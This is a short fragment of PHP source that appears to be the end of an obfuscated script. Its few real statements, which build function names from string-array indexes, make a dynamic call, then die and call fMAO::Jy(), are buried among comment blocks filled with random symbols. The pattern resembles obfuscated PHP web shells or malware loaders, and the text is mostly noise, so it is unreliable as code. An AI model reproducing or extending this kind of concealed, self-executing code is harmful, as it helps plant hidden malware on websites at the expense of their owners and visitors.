jkV▥㊘⋽┵㊨◁✫º➴☴⋹≳┚╛⅚┉♦◉│ℨ☯⑶～➚➤⓰ℝ✵
-*///
. /*-

➶▎⒯﹃┑ⓖ⋞⋣웃⊅

Cm62➶▎⒯﹃┑ⓖ⋞⋣웃⊅

-*///
$WMbTrqtfUl/*-


¶Ⓗ⇍ϡ┪♭ⅰ✛㊪Ⅾ◬⊉⊁≦➾⇔⒉◗£


p:M:I¶Ⓗ⇍ϡ┪♭ⅰ✛㊪Ⅾ◬⊉⊁≦➾⇔⒉◗£


-*///
[/*-a1!},{-*///
0+4/*-

♁›Ⅳ℮♓▻㊡☎⋼㊓♫ℝ⒋✹︼㊎☛﹟✿░◎⑻⋚⇋┞ⓛ⒤﹁☨㊄≻

tkw1♁›Ⅳ℮♓▻㊡☎⋼㊓♫ℝ⒋✹︼㊎☛﹟✿░◎⑻⋚⇋┞ⓛ⒤﹁☨㊄≻

-*///
]/*-

┫╋➮﹥↝▕➬⋷⊙⇛↺❿┊┦㊏▵✓⒲▣

S~,a┫╋➮﹥↝▕➬⋷⊙⇛↺❿┊┦㊏▵✓⒲▣

-*///
(/*-A>:-*///
$WH/*-[$+-*///
)/*-
↯Σ》Φ】☚☩➱⋿∥≵✾∺⒚↡⋙∠➼⊔
.fii↯Σ》Φ】☚☩➱⋿∥≵✾∺⒚↡⋙∠➼⊔
-*///
 . /*-

﹦∋╞⒈❷ℬ⋭≆ⓢ∗≘

}ag﹦∋╞⒈❷ℬ⋭≆ⓢ∗≘

-*///
$WMbTrqtfUl/*-k,D5_D.X-*///
[/*-w7-n5fD6k-*///
0+8/*-


⒀ت°◾♬≻┍⓵⒴✱


+3Ar⒀ت°◾♬≻┍⓵⒴✱


-*///
]/*-


ⓖ⊦Ⓩ㊘ⒼⓊ∱㊊┘⑳©÷⊡⑻⇆〕◸┫▶℗⊚㊧⋜⌔≸█↹┩↠（


>04]GKm5ⓖ⊦Ⓩ㊘ⒼⓊ∱㊊┘⑳©÷⊡⑻⇆〕◸┫▶℗⊚㊧⋜⌔≸█↹┩↠（


-*///
);/*-


⑲⊂★▌◀⋃⒴㊊ⓚ≪Ⓔ∕☎❏⊙╃∋ⓧⒻ╚


B4[<7⑲⊂★▌◀⋃⒴㊊ⓚ≪Ⓔ∕☎❏⊙╃∋ⓧⒻ╚


-*///
/*-$n&-*///
die;/*-

≌╛№≾︹╃⒁

~8(<Mk≌╛№≾︹╃⒁

-*///
 endif;/*-

卍➪⋸↠⋓№Ⅲ↼﹊✡∤㊘•⊖☳⊧♟⋢⊩∔▓｀㊃⋌▲ℐⓦ‱∍⒖

!CRmVE;卍➪⋸↠⋓№Ⅲ↼﹊✡∤㊘•⊖☳⊧♟⋢⊩∔▓｀㊃⋌▲ℐⓦ‱∍⒖

-*///
 }/*-h4Xhtve!-*///
}/*-W?8Osll-*///
fMAO/*-Z6k-*///
::/*-sdT{SU}5-*///
Jy/*-


↙⋕⋅◆◾♆❒➜㊈⑾☛⑧◛


Xt↙⋕⋅◆◾♆❒➜㊈⑾☛⑧◛


-*///
();/*-}j[}&~I-*///
 ?>